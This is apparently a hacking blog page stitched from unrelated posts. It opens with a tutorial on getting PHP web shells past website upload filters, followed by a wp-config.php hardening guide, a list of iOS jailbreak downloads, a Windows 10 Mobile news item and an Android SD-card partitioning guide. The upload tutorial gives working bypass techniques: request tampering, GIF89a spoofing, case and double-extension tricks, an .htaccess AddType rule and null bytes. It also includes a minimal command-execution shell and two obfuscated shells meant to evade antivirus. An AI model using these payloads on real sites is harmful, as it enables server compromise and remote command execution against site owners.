SHELL UPLOAD METHOD BY Zenodermus Javanicus

Here is the content i am going to discuss in this tutorial. 
1. Client side filters Bypass

Disable JavaScript in the browser.

HTTP Live Headers to replay the tampered request.

Tamper data using firefox addon.

Proxify the application and tamper the request.
2. Bypassing Content/type Verification

Change Content-Type using Request Modification.

Fool Server side check using GIF89a; header

Inject your payload in Image Metadata/Comment
3. Bypassing the Extension Black Listing

Try other executable extensions.

Bypass Case Sensitive Filter.

Idiotic Regex filter bypass.

Add shell to executable using .htaccess file.4. Bypassing the Extension White Listing

Null Byte Injection

Bypass using Double Extension

Invalid Extension Bypass
5. Bypassing the Content Length and Malicious script checks

Content Length Bypass

Malicious Script Checks Bypass6. Upload Shell using SQLi
7. Shell Upload Bypass using LFI

First of all i hope you know the basics of what a shell is and how to upload a shell and use it, so keeping all that aside we'll concentrate on shell upload bypasses over here:

1. Client Side Filters Bypass

First of all let us be clear what client side filters are?. Client side filters are the filters which are browser based or we can say use javascript to validate the type of file we are uploading. If the file doesnt seems valid then if gives a error. Allright every thing is fine till here, but the problem with such javascript based securities is its too much dependent on browser and an attacker can also tamper the request before if reach the server. Here are some of the tricks an attacker can play to bypass such securities:

1. Disable JavaScript in the browser.
2. HTTP Live Headers to replay the tampered request.
3. Tamper data using firefox addon.
4. Proxify the application and tamper the request.As all of the above are same type of bypass and knowing even one of them will work for you, so i will use the last approach in this tutorial. Its really simple setup BURP proxy with your browser and the game starts. I will show you basic steps to use BURP.

Step 1: Open your Burp proxy and make sure its listning to port 8080:

Step 2: Configure your Firefox to send the traffic via Localhost port 8080, Goto Tools->Options->Advanced->Network->Settings make the changes shown in the image.
 
You have sucessfully redirected the traffic via BURP. Now goto Proxy->Intercept Tab and turn ON the Interception if off, so that you can change the request content before it reach the server:

Now lets say there is a website where you are trying to upload shell and it shows error, that you can only upload image files, simply rename your shell.php to shell.php.jpg and upload the file. When you will click submit, a request will go from BURP. Change file filename back to shell.php and luckily if there is no check on server side then you will get your shell uploaded.

2. Bypassing Content/type Verification

1. Change Content-Type using Request Modification.
2. Fool Server side check using GIF89a; header
3. Inject your payload in Image Metadata/CommentChange Content-Type using Request Modification.
Many times developer rely on the request "content-Type", the uploading script checks the content-type and if its Image type then only the file is uploaded. The problem here again is the content-Type variable can be changed before it reach the server. As you can see in the Image the content type is "application/octet-stream", change it to "image/gif" and hope that will work for you.

Fool Server side check using GIF89a; header
Sometimes server side content signature check can be fooled using "GIF89a;" header in your shell. So heres an example:

GIF89a;
<?
system($_GET['cmd']);//or you can insert your complete shell code
?>

Inject your payload in Image Metadata/Comments
Well there are alot of hacks we can do with our image file some of them is injecting the payload into the metadata header using exiftools or you can use a tool named "edjpgcom.exe". Use command line "edjpgcom.exe yourimagefilename.jpg" to add comment to your image.

3. Bypassing the Extension Black Listing

Some times developers use black listing approach against the shell uploading, the problem with Black listing approad is always the same which is you always forget to block something or a new bypass may fuck your security. Here also its the same, lets say if a developer is filtering php files from uploading over the server. We have a number of ways to bypass it.

1. Try other executable extensions.
2. Bypass Case Sensitive Filter.
3. Idiotic Regex filter bypass.
4. Add shell to executable using .htaccess file.Try other executable extensions.
First we have have multiple php extensions which developer might have forgot so we can rename our file to shell.php1
shell.php2
shell.php2
shell.php4
shell.php5
shell.phtml
We can even try executing perl shell with an extention .pl or .cgi.

Bypass Case Sensitive Filter.
If all are nicely blacklisted we can still try changing case to see if the filter is case sensitive or not, in simple words try out:
shell.PhP
shell.Php1
shell.PhP2
shell.pHP2
shell.pHp4
shell.PHp5
shell.PhtMl

Idiotic Regex filter bypass.
Very few times you can come around a file extention check using regex, such cases might lead to a regex failure. Here the programmer might have made a bad regex which is only checking the presence of ".jpg" in filename, so such cases can be bypassed with using double extention like shell.jpg.php and so on.

Add shell to executable using .htaccess file.
But if we are fucking unlucky and all the above extensions do not work then we still have one good chance to get a shell over the website using .htaccess file.

A htaccess file is the configuration file in Apache server. Using one of its setting we can change the file type behavior. Now lets choose a file extention which is not blacklisted, one of my favorite in such cases is .shell extension. So here is a htaccess configration which you have to cope in a .htaccess file and then upload in the folder and then upload your php shell with a name shell.shell and boom!! it will execute.

AddType application/x-httpd-php .shell

4. Bypassing the Extension White Listing

In some cases developers have used the extension white listing, bypassing such security is usually web server or Language based bypasses. Its a case when developer is not allowing any other extention other than some white listed extensions, such as lets say its a image upload function so only jpg,jpeg,gif,png,bmp etc are only allowed. We can try the following tricks:

1. Null Byte Injection
2. Bypass using Double Extension
3. Invalid Extension BypassNull Byte Injection
Our first trick is Null byte injection where some times when we insert a filename likeshell.php.jpg the part after got nulled by the language and the file gets uploaded with the name shell.php.

Bypass using Double Extension
In such cases we can use shell.php.jpg, shell.php:.jpg, shell.php;.jpg sometimes it migh lead to shell execution but usually its a webserver or OS based bypass. So we cant really blame the programmer in such cases. But leaving the filenames unchanged is a bad programming practice.

Invalid Extension Bypass
Here is another server side exploit, sometimes when we use extentions like .test which is not recognized by the operating system, then the first extension is used, so we can try uploading shell.php.test.

5. Bypassing the Content Length and Malicious script checks

Content Length Bypass
Sometimes we face a content length check which anyway is not so common, but we know there is no end to human stupidity. Keeping that in mind there are some very easy ways to bypass such checks. If the server is checking for a very small file input then here is the smalles shell code you can use:

<?system($_GET[0]);

Now the next part file size check for bigger files, bypass can be Pumping a file to make it larger, hmmmm i dont think i need to tell you that, its obvious you can insert a lot of junk into your file.

Malicious script checks Bypass
Many times we successfully uploads a shell over a server but when we try to access it we finds out its already removed. Thanks usually because of some AV or other scripts checking for malicious files over the server and removing. Now we can deal with such shits easily but i am writing this one for those who dont know to deal with such problems. So here we need some basic knowledge of coding or else some copy/paste may do. Here i am including some shells scripts which works in such situations:
Shell-1: you can execute it like "shell.php?0=system&1=ls"

<?
@$_[]=@! _; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((  $__) ($__   ))].=$_;
$_[]=  $__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__ $__)  $_[$__-$__]).($__ $__ $__) $_[$__-$__];
$_[$__ $__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__ $__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__ $__] .=($_[$__][$__ $__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__  $__] ;$_[@-_]($_[@! _] );
?>

shell-2: You can execute it like "shell.php?_=system&__=ls"

<?php
$_="{"; 
$_=($_^"<").($_^">;").($_^"/");
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

we can even upload our own php scrips and do some basic operations. You can also use php-reverse-connection shell which comes in handy, and create a reverse connection using netcat.

How To Protect Wp-config.php file So You Don’t Get Hacked

Today we will be try to protect our wp-config.php file as we know that wp-config.php file contains very sensitive information about your WP Installation and database access, table prefix and Secret Keys.

The wp-config.php file is a standard of WordPress installation.
Now question is that how we protect it.
You certainly don't want this file falling into the wrong hands.


How to protect your WordPress wp-config.php file:
I will be tell you two basic methods which will protect your wp-config.php file
First I will be tell you how to protect it through .htaccesss file.
1. Download your .ht access file from the server. This is located in the same section as your wp-config.php or index.php file. (If you don't have an .htaccess file, then you will need to create one.)
2. Using a text editor, like Notepad, open your .htaccess file.
3. Copy and paste the following code into your .htaccess file to deny access to your wp-config.php file.
# protect wpconfig.php
order allow,deny
deny from all
The second method which I am telling you guys is by protecting the wp-config by moving the file to unpredictable location.
Ok example that web include path for your server was /home/Name/public_html/
You can actually save a file in the /homeName/ area and it won’t be web accessible. Meaning that even if somebody were able to read your wp-config, they wouldn’t get anything valuable.
First step
Create a “config.php”
Within this config.php file I included the following:
<?php
define('DB_NAME', 'your_db_name'); // The name of the database
define('DB_USER', 'your_db_username'); // Your MySQL username
define('DB_PASSWORD', 'your_db_pass'); // DB Password
define('DB_HOST', 'localhost'); // Localhost
$table_prefix = 'yourdbprefix_'; // Only numbers, letters, and underscores please!
?>
Uploaded this file to a non-WWW readable location. Normally this should be the directory before “public_html” or “www”.
Modify the WP-Config
Then modified the “wp-config.php” file to include the file. If somebody were to some how read the contents of my WP-Config, all they would see is this:

<?
phpinclude('/home/Name/config.php');
// Change this to localize WordPress. A corresponding MO file for the
// chosen language must be installed to wp-includes/languages
.// For example, install de.mo to wp-includes/languages and set WPLANG to 'de'
// to enable German language support.
define ('WPLANG', '');
/* That's all, stop editing! Happy blogging. */
define('ABSPATH', dirname(__FILE__).'/');
require_once(ABSPATH.'wp-settings.php');
?>
Hopefully you get the idea. Save your sensitive information in a non-WWW location, and have the WP-Config file read it in. This way you won’t have to change anything if you have to upgrade WordPress.

This Tutorial is not mine, Author is kind of my big brother and lot lot better than me :)

Jailbreak

What is Jailbreaking: iOS jailbreaking is the process of removing the limitations on Apple devices running the iOS operating system through the use of software and hardware exploits – such devices include the iPhone, iPod touch, iPad, and second generation Apple TV. Jailbreaking permits root access to the iOS operating system, allowing the download of additional applications, extensions, and themes that are unavailable through the official Apple App Store.

Taig Jailbreak Tool 

Early this month, Apple released iOS 8.1.3, part of users have successfully upgraded to the newest system version, while 

temporarily there is no untethered jailbreak mothed for iOS 8.1.3. As said , Taig Jailbreak Team have already completed the untethered jailbreak 

support for iOS 8.2. Recently, Apple just released the iOS 8.2 beta 5 version, which means the official iOS 8.2 would come soon.

Announce the TaiG Jailbreak Tool for iOS 8.2 beta 1&2 on Windows.To those who have already upgraded to iOS 8.1.3, we suggest you upgrading to iOS 8.2 beta 1&2 by using TaiG Firmware Upgrade Tool, and then use TaiG Jailbreak Tool to jailbreak your device. To TaiG users.Downloadv1.3.0 for iOS 8.2 Beta2v1.2.1 for iOS 8.0-8.1.2

---

Pangu Jailbreak your iOS Device for Latest version iOS 8 and iOS 8.1Pangu jailbreak (iOS8) version 1.0 is ready for strict jailbreak developer version.Available for iPod Touch, iPhone 4S, iPhone5/5C/5S, iPhone6/6plus, iPad Mini2/3, iPad/iPad Air/Air2Download

---

evasiOn - iOS 7 JailbreakDownload Evasion - iOS 7 For Mac OS X & Window--------------------------------------------------------------------------------------------------------Pangu- Jailbreak iOS 7.1 and iOS 7.1.1.The untethered jailbreak is compatible with iPhone 5s, iPhone 5c, iPhone 4S, iPhone 4, iPad Air, iPad 4, iPad 3, iPad 2, iPad mini, Retina iPad mini and iPod touch 5G running iOS 7.1-iOS 7.1.1.Download

---

RedsnowRedsn0w version 0.9.15b1, with significant new features supporting restoring to older firmware no longer being signed by Apple.  For brevity, we’ll list most of the new features in bullet formFeatures:

• restore from any 5.x iOS to any other (up, down or the same) 5.x iOS on all devices as long as you have the correct blobs (see more below)

• Cydia now included in the tethered 6.0 jailbreak on A4 devices

• automatically “Just Boot” tethered when qualifying A4 device connects in DFU mode

• untethered 6.0 jailbreak on old-bootrom 3GS

• untethered 6.0 hactivation on any 3GS or iPhone4

• directly restore pre-A5 devices to earlier firmware — no more complicated 15-step how-to’s with stitching, iTunes errors, and “hosts file” concerns

• fetch new signed blobs for any IPSW (present or future — no redsn0w update required) using Extras->SHSH Blobs->New

• block the BB update for any 3GS or iPhone4 restore (past, present, or future — no redsn0w update required) using Extras->Even More->Restore

• deactivate any iPhone, useful for testing your “official” unlock status through iTunes.  (Please only deactivate your own iPhone!)

• activation status shown on “Even more” page

• significantly more (very nerdy) info returned by “Identify” button when device is in Normal mode

• tethered jailbreak of ATV2 supported (but the only thing available for it is the SSH2 custom bundle available here — no Cydia yet.  Must use “Select IPSW” for tethered boot of ATV2 for now).

• auto-exit WTF mode for older devices with broken buttons

• any time a set of blobs is fetched remotely (from Apple or Cydia), redsn0w also saves them locally (and will check there first if you click “Local”)

Read moreDownloadredsn0w 0.9.15b3 (OS X — use Ctrl-Click->Open if on Mountain Lion for now)redsn0w 0.9.15b3 (Windows — run in Adminstrator Mode)

---

evasiOn - iOS 6.0-6.1.2 JailbreakCompatible with all iPhone, iPod touch, iPad and iPad mini models running iOS 6.0 through 6.1.2Features:

• A computer, running Windows (XP minimum), Mac OS X (10.6 minimum) or

• Linux (x86 / x86_64)

• An iPhone, iPad or iPod running iOS 6.0 through 6.1.2 (you may check in Settings /

• General / About => Version)

• A USB cable to connect the device to the computer

Windows 10 Mobile Launch

Looks like Windows 10 Mobile will make the holiday season.

Between the launch date of the Microsoft Lumia 950XL and comments made by Microsoft’s official Lumia Facebook account, we now know when Microsoft’s Windows 10 Mobile will roll out.


Microsoft said Tuesday that the company plans to launch the its new Lumia 950XL and Lumia 950 “in November,” according to a slide shown during Microsoft’s launch event. Microsoft exhibited those phones running with Windows 10 Mobile (which Microsoft sometimes simply calls Windows 10), and they’re expected to ship with what is presumed to be the final version of the OS.


On Wednesday and again on Thursday, Microsoft took to its Facebook page to clarify the dates on which older phones could receive Windows 10.


“Windows 10 is available on PCs and tablets now, and while Lumia 950 and Lumia 950 XL ship with Windows 10 for phones, broad availability of Windows 10 on other devices, including mobile phones, will begin rolling out in December,” the official Lumia account wrote.


Why this matters: With just a tiny fraction of the smartphone market, Microsoft needs to convince consumers to upgrade, and the combination of the new Lumia phones and its latest smartphone OS is the most potent option it has. As Brad Sams at Thurrott.com noted, however, it’s possible that customers with older Windows Phone devices will simply choose to upgrade to the latest phones instead.

A delay?

The notion of an official release date for almost any software is fast becoming an anachronism. Microsoft has continued to release preview builds to the public, and will presumably continue to do so after the Windows 10 Mobile launch occurs.

However you define the process, Windows 10 Mobile's rollout is proving a bit slower than originally expected. Microsoft’s Joe Belfiore has said previously that users should expect a flood of new Windows 10 launches during this fall. An earlier report pegged the Windows 10 Mobile launch during the third quarter, although that was never confirmed.

Early versions of the Windows 10 Mobile Preview builds have been buggy and slow, although they’ve improved over time. The latest builds haven’t been all that bad.

Still, it was probably smart of Microsoft to launch the new Lumia 950 phones (as well as the Lumia 550) in advance of the upgrade. Those who are desperate to buy the new hardware will sink a few hundred dollars into them, converting them into evangelists for the OS—and making the free upgrade to the Windows 10 Mobile OS for older Windows Phone users all the more interminable.

How to make partition in SD card and make more space in Internal Storage

How to make partition in SD card and make more space in Internal Storage

Hey all,

Some days ago my friend Jay Complained me about her internal storage in NOTE 2...
this is the solution Read carefully

Before buying a phone all of us first checks the features of the phone which include its
camera,processor,ram,screen size....etc...etc. And we also not  to forget to checks its internal storage..!!!!
Most of you must have rejected the phone because it doesn't have sufficient internal storage ... !!
But today we have came up with a trick with the help of which you can:
1) Ease the burden of the internal storage on the device.
2) The issue of lower internal memory space on your mobile devices, especially for smartphones or PC tablets, will be resolved too.
3) By default your apps will be installed in SD card.

Does it mean that we will increase the internal storage capacity?
The answer is big NO...we will create partition on SD card so that the apps that usually gets install in your phone memory will be install in you SD card by default..giving you free internal space!

Lets Get started:

Note:Don't forget to backup all your micro SD data!

1)Partitioning of SD card.

1.1) Download the tool

 First, you have to download the tool, in this article we will use the minitool partition wizard, then install it on your PC / laptop.

1.2) How to use the Tool

1. Make sure that your phone Usb Connection mode is Mass Storage mode.Now connect your phone to PC.

2. Run the minitool partition wizard on your PC, choose Basic/Disk 2 then right click and choose move/resize just like the image below

3. On this section, we will create the first partition that can be used for storing things like music,movies and files etc. So this partition needs a bigger storage space, say between 75% - 95% or even more of the total of the microSD storage capacity. You can set the storage capacity by sliding the right bar edge just like the image below. Click OK after that.

4. Then we will use the rest of the storage capacity (as your own setting above) for the second partition. Look at the picture below, right click on it, then choose create. If there's a popup menu shown after clicking create, just click on "yes" option.

5. Look at the image below. For the "file system" section, set it as Ext2, and for "create as" section, set it as primary then click OK.

6. Then if you're done, click apply. But make sure that you have sets the right file system (FAT32 & Ext2), and both of them create as primary.

Now a pop up will appear asking you to close all apps on your PC (Except this app), and do not use the power saver / battery saver mode on your PC / laptop before clicking OK.
Wait till the Partition is Done

2) Using Link2SD

First of all let me tell you what exactly Link2SD do??

This app is very useful for the Android users with small internal storage capacity. 

Link2SD can be used for moving the data of the applications that is usually installed in the phone memory to the Partition that we have created in the above step.Link2SD will move the entire user apps onto SD card forcefully and apps entire data to SD card including dalvik-cache files and lib files(apk+data).

And the other special feature on this app, Link2SD is can be used for removing the system apps (bloatware) which it will very helpful to save more space on device's internal storage.

Note:You have to root your Android device first before you can use the main featureMake sure that your microSD card has been partitioned. Go to this link to create partition on SD card

2.1) Download the tool

Downloading Link2SD which is easily available in Playstore..

2.2) How to use the Tool

1. Run the app (Link2SD) on the device's menu. If the app is requesting the SuperUser access (like the image below) select "allow" option.

2. For the first run if you've been partitioned your SD card, the app will shown a popup option. Choose one of them according to the file system on your SD card's 2nd partition, and restart your device after that, and re-launch Link2SD after restarting. If there's shown an "error mount script" warning, you have to re-partitioning your SD card. I suggest you to change the file system on the SD card's 2nd partition (if you use ext2 before, use ext3 / ext4 / FAT32 file system when re-partitioning)

3. If it's done well, choose the apps that you wants to move to SD card's 2nd partition. Touch / tap softkey (capacitive button or "option" key) choose multi select option, and you can select all option, or you can choose manually one by one. Choose actions after that.

4. After selecting action a pop up will open with many options ,just select the create link option

5. Tick all the options, then click OK.

6. After moving all the apps to SD card, you can check the memory status on your Device.

As you can see on the image above, the total apps data that have been moved on SD card's second partition is shown on the white circle.

Thats it ...Now you will have lots of Free Internal Memory!!

Uninstalling / removing system app with Link2SD

1) Select the app you want to uninstall and then choose action.

2) Select Uninstall

3) Then Link2SD will shown a warning message, to confirming about the removal, read it carefully. If you're sure enough, simply click OK.